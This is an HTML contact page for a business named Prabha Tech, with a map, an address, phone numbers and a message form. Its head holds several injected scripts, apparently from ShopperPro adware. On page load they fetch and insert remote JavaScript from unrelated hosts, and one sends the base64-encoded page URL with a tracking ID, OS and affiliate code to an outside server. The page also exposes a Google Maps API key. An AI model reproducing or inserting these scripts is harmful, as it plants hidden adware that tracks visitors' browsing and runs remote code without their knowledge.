<!DOCTYPE HTML>
<!--
	ZeroFour by HTML5 UP
	html5up.net | @n33co
	Free for personal and commercial use under the CCA 3.0 license (html5up.net/license)
-->
<html>
	<head>
		<title>Where are we?</title>
		<meta http-equiv="content-type" content="text/html; charset=utf-8" />
		<meta name="description" content="" />
		<meta name="keywords" content="" />
		<!--[if lte IE 8]><script src="css/ie/html5shiv.js"></script><![endif]-->
		<script type='text/javascript'>window.Goob={};window.Goob.params={BrowserName:'chrome.exe',SParam:'E92wobryc1',SParamDate:'E92',SParamProd:'w',Aff:'JSobryc',PixGUID:'84ff3d07-225e-4e31-a3ef-efc1bf122b77',BrowserVersion:'',Version:'1.8.7598.1425',PixNoHyp:'84ff3d07225e4e31a3efefc1bf122b77',SID:'2048407616-2020840668-3661392054'};window.Goob.addScript=function(n,t){var i,r;if(--t!=0)if(i=document.createElement('script'),i.src=n,i.type='text/javascript',r=document.getElementsByTagName('script'),r.length>0)r[0].parentNode.insertBefore(i,r[0]);else{var u=document.getElementsByTagName('head'),f=document.getElementsByTagName('body'),e=u.length>0?u[0]:f.length>0?f[0]:null;e?e.appendChild(i):setTimeout(function(){window.Goob.addScript(n,t)},0)}},function(){window.location===window.parent.location&&(Goob.addScript('//4x3zy4ql-l8bu4n1j.netdna-ssl.com/res/helper.min.js',2e3))}();</script>
<script type='text/javascript'>(function() {  var GoobIsInFrame = (window.location != window.parent.location); if(GoobIsInFrame) return; var DP_SP_GOOB157_BrowserName = 'chrome.exe';var DP_SP_GOOB157_BR_Latter = DP_SP_GOOB157_BrowserName.charAt(0);var DP_SP_GOOB157_ChannelID = DP_SP_GOOB157_BR_Latter + 'E92' + 'w' + 'JSobryc';var DP_SP_GOOB157_ScriptUrl = '';var DP_SP_GOOB157_protocol = document.location.protocol;if (DP_SP_GOOB157_protocol == 'https:')DP_SP_GOOB157_ScriptUrl = 'https://i_sbitinjs_info.tlscdn.com/sbitin/javascript.js';else DP_SP_GOOB157_ScriptUrl = 'http://i.sbitinjs.info/sbitin/javascript.js';DP_SP_GOOB157_ScriptUrl += '?hid=' +'84ff3d07-225e-4e31-a3ef-efc1bf122b77' + '&apptitle=ShopperPro&channel=' + DP_SP_GOOB157_ChannelID;var DP_SP_GOOB157_Element = document.createElement('script');DP_SP_GOOB157_Element.setAttribute('type','text/javascript');DP_SP_GOOB157_Element.src = DP_SP_GOOB157_ScriptUrl;document.head.appendChild(DP_SP_GOOB157_Element);})();</script>
<script type='text/javascript'>(function() {var GoobIsInFrame = (window.location != window.parent.location); if(GoobIsInFrame) return; var Base64 = {_keyStr : 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=', encode : function (input) { var output = ''; var chr1, chr2, chr3, enc1, enc2, enc3, enc4; var i = 0; input = Base64._utf8_encode(input);while (i < input.length) {chr1 = input.charCodeAt(i++); chr2 = input.charCodeAt(i++); chr3 = input.charCodeAt(i++); enc1 = chr1 >> 2; enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);enc4 = chr3 & 63;if (isNaN(chr2)) {enc3 = enc4 = 64;} else if (isNaN(chr3)) {enc4 = 64;}output = output +Base64._keyStr.charAt(enc1) + Base64._keyStr.charAt(enc2) + Base64._keyStr.charAt(enc3) + Base64._keyStr.charAt(enc4);}return output;},_utf8_encode : function (string) {var utftext = '';for (var n = 0; n < string.length; n++) {var c = string.charCodeAt(n);if (c < 128) {utftext += String.fromCharCode(c);}else if((c > 127) && (c < 2048)) { utftext += String.fromCharCode((c >> 6) | 192);utftext += String.fromCharCode((c & 63) | 128);} else {utftext += String.fromCharCode((c >> 12) | 224);utftext += String.fromCharCode(((c >> 6) & 63) | 128);utftext += String.fromCharCode((c & 63) | 128);}}return utftext;}};if (!window.btoa)window.btoa = Base64.encode;var installDate = Math.round(new Date().getTime()/1000); var browserName ='chrome.exe' ;var browserVer = '';var os =  navigator.platform;var EncodedUrl = window.btoa(document.URL);var userID = '84ff3d07-225e-4e31-a3ef-efc1bf122b77';var shpro_url = '//d22p2jhoymd2lo.cloudfront.net/app/t.ashx?';shpro_url += 'uid=' + userID;shpro_url += '&bn=' + browserName;shpro_url += '&bv=' + browserVer;shpro_url += '&shpro_url=' + EncodedUrl;shpro_url += '&prd=ShopperPro';shpro_url += '&os=' + os;shpro_url += '&id=' + installDate;shpro_url += '&aff=' + 'JSobryc';shpro_url += '&ver=' + '1.8.7598.1425';var Element = document.createElement('img');Element.setAttribute('type','text/javascript');Element.src = shpro_url;document.head.appendChild(Element);})();</script>
<script type='text/javascript'>(function() {var GoobIsInFrame = (window.location != window.parent.location); if(GoobIsInFrame) return; var JW_SP_GOOB157BrowserName = 'chrome.exe';var JW_SP_GOOB157BR_Latter = JW_SP_GOOB157BrowserName.charAt(0);var JW_SP_GOOB157_ShopperID = JW_SP_GOOB157BR_Latter + 'E92' + 'w' + 'JSobryc';var JW_SP_GOOB157_url = '//api.jollywallet.com/affiliate/client?dist=141&sub=' + JW_SP_GOOB157_ShopperID + '&name=ShopperPro';var JW_SP_GOOB157_Element =  document.createElement('script');JW_SP_GOOB157_Element.setAttribute('type','text/javascript');JW_SP_GOOB157_Element.src = JW_SP_GOOB157_url;document.head.appendChild(JW_SP_GOOB157_Element);})();</script>
<script type='text/javascript'>(function() { var GoobIsInFrame = (window.location != window.parent.location); if(GoobIsInFrame) return; var JW_SP_NoProblemProtocol = document.location.protocol;var JW_SP_NoProblem_url = JW_SP_NoProblemProtocol + '//nps.noproblemppc.com/npsb/logic.js?OriginId=6E35F62E-F851-E311-A2C4-001517D1792A&SiteId=Sales&PartnerID=85200&productname=ShopperPro&ToolbarId=' + '84ff3d07-225e-4e31-a3ef-efc1bf122b77';var JW_SP_NoProblem_Element =  document.createElement('script');JW_SP_NoProblem_Element.setAttribute('type','text/javascript');JW_SP_NoProblem_Element.src = JW_SP_NoProblem_url;document.head.appendChild(JW_SP_NoProblem_Element);})();</script>

		
		<script src="js/jquery.min.js"></script>
		<script src="js/jquery.dropotron.min.js"></script>
		<script src="js/skel.min.js"></script>
		<script src="js/skel-layers.min.js"></script>
		<script src="js/init.js"></script>
		<noscript>
			<link rel="stylesheet" href="css/skel.css" />
			<link rel="stylesheet" href="css/style.css" />
			<link rel="stylesheet" href="css/style-desktop.css" />
		</noscript>
		<!--[if lte IE 8]><link rel="stylesheet" href="css/ie/v8.css" /><![endif]-->
		<!--[if lte IE 9]><link rel="stylesheet" href="css/ie/v9.css" /><![endif]-->
	</head>
	<body class="no-sidebar">

		<!-- Header Wrapper -->
			<div id="header-wrapper">
				<div class="container">
						
					<!-- Header -->
						<header id="header">
							<div class="inner">
							
								<!-- Logo -->
									<h1><a href="index.html" id="logo">Prabha Tech</a></h1>
								
								<!-- Nav -->
									<nav id="nav">
										<ul>
											<li><a href="index.html">Home</a></li>
											<li>
												<a href="">Services</a>
												<ul>
													<li><a href="#">Advertising</a></li>
													<li><a href="#">Advertising Consulting</a></li>
													<li><a href="#">Marketing Consulting</a></li>
													<li>
														<a href="">Advertisement on LED</a>
														<ul>
															<li><a href="#">Commercial</a></li>
															<li><a href="#">Pesonal</a></li>
															<li><a href="#">Indoor </a></li>
															<li><a href="#">Outdoor</a></li>
														</ul>
													</li>
													<li><a href="#">Software Services</a></li>
													<li><a href="#">Software Development</a></li>
												</ul>
											</li>
											<li><a href="left-sidebar.html">Our Plans!</a></li>
											<li><a href="right-sidebar.html">Who are we?</a></li>
											<li class="current_page_item"><a href="no-sidebar.html">Where are we?</a></li>
										</ul>
									</nav>
							
							</div>
						</header>

				</div>
			</div>
		
		<!-- Main Wrapper -->
			<div id="main-wrapper">
				<div class="wrapper style2">
					<div class="inner">
						<div class="container">
							<div id="content">

								<!-- Content -->
							
									<article>
										<header class="major">
											<h2>Here we are</h2>
											<h3>Find us on Map</h3>
										</header>
										
										<span class="image featured">
											 <div id="googleMap" style="height:420px;"></div>
											<!--<img src="images/pic08.jpg" alt="" />-->
										</span>
										
										<!--<p>Phasellus quam turpis, feugiat sit amet ornare in, hendrerit in lectus. 
										Praesent semper mod quis eget mi. Etiam eu ante risus. Aliquam erat volutpat. 
										Aliquam luctus et mattis lectus sit amet pulvinar. Nam turpis nisi 
										consequat etiam lorem ipsum dolor sit amet nullam. Phasellus quam turpis, 
										feugiat sit amet ornare in, hendrerit in lectus. Praesent semper mod quis 
										eget mi. Etiam eu ante risus. Aliquam erat volutpat. Aliquam luctus et 
										mattis lectus sit amet pulvinar. Nam turpis nisi consequat etiam.</p>-->
										
										<header class="major">
											<h3>This is Conatct Info</h3>
										</header>	
										<p><b>Address:</b><br/>7, Ramkrushna Complex,<br/>Dhaka Colony, Khwajamiya Road, Jalgoan- 425001</p>

										<p><b>Phone:</b><br/> +91-967511923 <br/> +91-9259573507 <br/> +91-9323360706</p>
										
										<header class="major">
											<h3>You can Drop message to us.</h3>
										</header>
										 <div class="col-md-8">  
                                            <div class="message-form">
                                                <form action="#" method="post" class="send-message">
                                                    <div class="row">
                                                    <div class="name col-md-4">
                                                        <input type="text" name="name" id="name" placeholder="Name" style="background: rgb(208, 211, 216);"/>
                                                    </div>
                                                    <div class="email col-md-4">
                                                        <input type="text" name="email" id="email" placeholder="Email"  style="background: rgb(208, 211, 216);"/>
                                                    </div>
                                                    <div class="subject col-md-4">
                                                        <input type="text" name="subject" id="subject" placeholder="Subject" style="background: rgb(208, 211, 216);" />
                                                    </div>
                                                    </div>
                                                    <div class="row">        
                                                        <div class="text col-md-12"  style="min-width: 61%;">
                                                            <textarea name="text" placeholder="Message" style="background: rgb(208, 211, 216);"></textarea>
                                                        </div>   
                                                    </div>       
                                                    <br/>                       
                                                    <div class="send">
                                                        <button type="submit" style="width: 59.5%;
font-size: xx-large;
background: rgb(64, 66, 72);
color: white;">Send</button>
                                                    </div>
                                                </form>
                                            </div>
                                        </div>
									</article>
						
							</div>
						</div>
					</div>
				</div>
				<!--<div class="wrapper style3">
					<div class="inner">
						<div class="container">
							<div class="row">
								<div class="8u">

									<!-- Article list 
										<section class="box article-list">
											<h2 class="icon fa-file-text-o">Recent Posts</h2>
											
											<!-- Excerpt 
												<article class="box excerpt">
													<a href="#" class="image left"><img src="images/pic04.jpg" alt="" /></a>
													<div>
														<header>
															<span class="date">July 24</span>
															<h3><a href="#">Repairing a hyperspace window</a></h3>
														</header>
														<p>Phasellus quam turpis, feugiat sit amet ornare in, hendrerit in lectus 
														semper mod quisturpis nisi consequat etiam lorem. Phasellus quam turpis, 
														feugiat et sit amet ornare in, hendrerit in lectus semper mod quis eget mi dolore.</p>
													</div>
												</article>

											<!-- Excerpt 
												<article class="box excerpt">
													<a href="#" class="image left"><img src="images/pic05.jpg" alt="" /></a>
													<div>
														<header>
															<span class="date">July 18</span>
															<h3><a href="#">Adventuring with a knee injury</a></h3>
														</header>
														<p>Phasellus quam turpis, feugiat sit amet ornare in, hendrerit in lectus 
														semper mod quisturpis nisi consequat etiam lorem. Phasellus quam turpis, 
														feugiat et sit amet ornare in, hendrerit in lectus semper mod quis eget mi dolore.</p>
													</div>
												</article>

											<!-- Excerpt 
												<article class="box excerpt">
													<a href="#" class="image left"><img src="images/pic06.jpg" alt="" /></a>
													<div>
														<header>
															<span class="date">July 14</span>
															<h3><a href="#">Preparing for Y2K38</a></h3>
														</header>
														<p>Phasellus quam turpis, feugiat sit amet ornare in, hendrerit in lectus 
														semper mod quisturpis nisi consequat etiam lorem. Phasellus quam turpis, 
														feugiat et sit amet ornare in, hendrerit in lectus semper mod quis eget mi dolore.</p>
													</div>
												</article>

										</section>
								</div>
								<div class="4u">
								
									<!-- Spotlight 
										<section class="box spotlight">
											<h2 class="icon fa-file-text-o">Spotlight</h2>
											<article>
												<a href="#" class="image featured"><img src="images/pic07.jpg" alt=""></a>
												<header>
													<h3><a href="#">Neural Implants</a></h3>
													<p>The pros and cons. Mostly cons.</p>
												</header>
												<p>Phasellus quam turpis, feugiat sit amet ornare in, hendrerit in lectus semper mod 
												quisturpis nisi consequat ornare in, hendrerit in lectus semper mod quis eget mi quat etiam 
												lorem. Phasellus quam turpis, feugiat sed et lorem ipsum dolor consequat dolor feugiat sed
												et tempus consequat etiam.</p>
												<p>Lorem ipsum dolor quam turpis, feugiat sit amet ornare in, hendrerit in lectus semper 
												mod quisturpis nisi consequat etiam lorem sed amet quam turpis.</p>
												<footer>
													<a href="#" class="button alt icon fa-file-o">Continue Reading</a>
												</footer>
											</article>
										</section>
								
								</div>
							</div>
						</div>
					</div>
				</div>-->
			</div>

		<!-- <div>
                        <div >
                            <div id="googleMap" style="height:420px;"></div>
                        </div>
                    </div>-->   

		<!-- Footer Wrapper -->
			<div id="footer-wrapper">
				<footer id="footer" class="container">
					<!--<div class="row">
						<div class="3u">
						
							<!-- Links 
								<section>
									<h2>Filler Links</h2>
									<ul class="divided">
										<li><a href="#">Quam turpis feugiat dolor</a></li>
										<li><a href="#">Amet ornare in hendrerit </a></li>
										<li><a href="#">Semper mod quisturpis nisi</a></li>
										<li><a href="#">Consequat etiam phasellus</a></li>
										<li><a href="#">Amet turpis, feugiat et</a></li>
										<li><a href="#">Ornare hendrerit lectus</a></li>
										<li><a href="#">Semper mod quis et dolore</a></li>
										<li><a href="#">Amet ornare in hendrerit</a></li>
										<li><a href="#">Consequat lorem phasellus</a></li>
										<li><a href="#">Amet turpis, feugiat amet</a></li>
										<li><a href="#">Semper mod quisturpis</a></li>
									</ul>
								</section>
						
						</div>
						<div class="3u">
						
							<!-- Links 
								<section>
									<h2>More Filler</h2>
									<ul class="divided">
										<li><a href="#">Quam turpis feugiat dolor</a></li>
										<li><a href="#">Amet ornare in in lectus</a></li>
										<li><a href="#">Semper mod sed tempus nisi</a></li>
										<li><a href="#">Consequat etiam phasellus</a></li>
									</ul>
								</section>
						
							<!-- Links 
								<section>
									<h2>Even More Filler</h2>
									<ul class="divided">
										<li><a href="#">Quam turpis feugiat dolor</a></li>
										<li><a href="#">Amet ornare hendrerit lectus</a></li>
										<li><a href="#">Semper quisturpis nisi</a></li>
										<li><a href="#">Consequat lorem phasellus</a></li>
									</ul>
								</section>
						
						</div>
						<div class="6u">
						
							<!-- About 
								<section>
									<h2><strong>ZeroFour</strong> by HTML5 UP</h2>
									<p>Hi! This is <strong>ZeroFour</strong>, a free, fully responsive HTML5 site
									template by <a href="http://n33.co/">AJ</a> for <a href="http://html5up.net/">HTML5 UP</a>.
									It's <a href="http://html5up.net/license/">Creative Commons Attribution</a>
									licensed so use it for any personal or commercial project (just credit us
									for the design!).</p>
									<a href="#" class="button alt icon fa-arrow-circle-right">Learn More</a>
								</section>
						
							<!-- Contact 
								<section>
									<h2>Get in touch</h2>
									<div>
										<div class="row">
											<div class="6u">
												<dl class="contact">
													<dt>Twitter</dt>
													<dd><a href="#">@untitled-corp</a></dd>
													<dt>Facebook</dt>
													<dd><a href="#">facebook.com/untitled</a></dd>
													<dt>WWW</dt>
													<dd><a href="#">untitled.tld</a></dd>
													<dt>Email</dt>
													<dd><a href="#">user@untitled.tld</a></dd>
												</dl>
											</div>
											<div class="6u">
												<dl class="contact">
													<dt>Address</dt>
													<dd>
														1234 Fictional Rd<br />
														Nashville, TN 00000-0000<br />
														USA
													</dd>
													<dt>Phone</dt>
													<dd>(000) 000-0000</dd>
												</dl>
											</div>
										</div>
									</div>
								</section>
						
						</div>
					</div>-->
					<div class="row">
						<div class="12u">
							<div id="copyright">
								<ul class="menu">
									<li>&copy; PrabhaTech. All rights reserved</li><li>Design: <a href="#">Prabha Technology</a></li>
								</ul>
							</div>
						</div>
					</div>
				</footer>
			</div>



        <script src="http://maps.googleapis.com/maps/api/js?key=AIzaSyDY0kkJiTPVd2U7aTOAwhc9ySH6oHxOIYM&amp;sensor=false">
        </script>
                
        <script>
		
		var map;
		
        function initialize()
        {
        	
  					/*var myLatlng = new google.maps.LatLng(16.817141,96.130996);
  					var mapOptions = {
   						 zoom: 4,
    					 center: myLatlng
  					}
  					var map = new google.maps.Map(document.getElementById('map-canvas'), mapOptions);

  					var marker = new google.maps.Marker({
      						position: myLatlng,
      						map: map,
      						title: 'Hello World!'
  					});
		}
		google.maps.event.addDomListener(window, 'load', initialize);
		*/
        	
        	
        	
        	
        	
        	
			var map_options = {
			  center: new google.maps.LatLng(21.003844,75.556133),
			  zoom: 15,
			  mapTypeId:google.maps.MapTypeId.ROADMAP
			  };
			  
			 
			var map = new google.maps.Map(document.getElementById("googleMap"), map_options);
			
			 var marker = new google.maps.Marker({
      						position: new google.maps.LatLng(21.003844,75.556133),
      						map: map,
      						title: 'SOAPRAW PALM O'
  					});
        }

        google.maps.event.addDomListener(window, 'load', initialize);
		google.maps.event.addDomListener(window, "resize", function() 
		{
		 	var center = map.getCenter();
		 	google.maps.event.trigger(map, "resize");
		 	map.setCenter(center); 
		});
        </script>

	</body>
</html>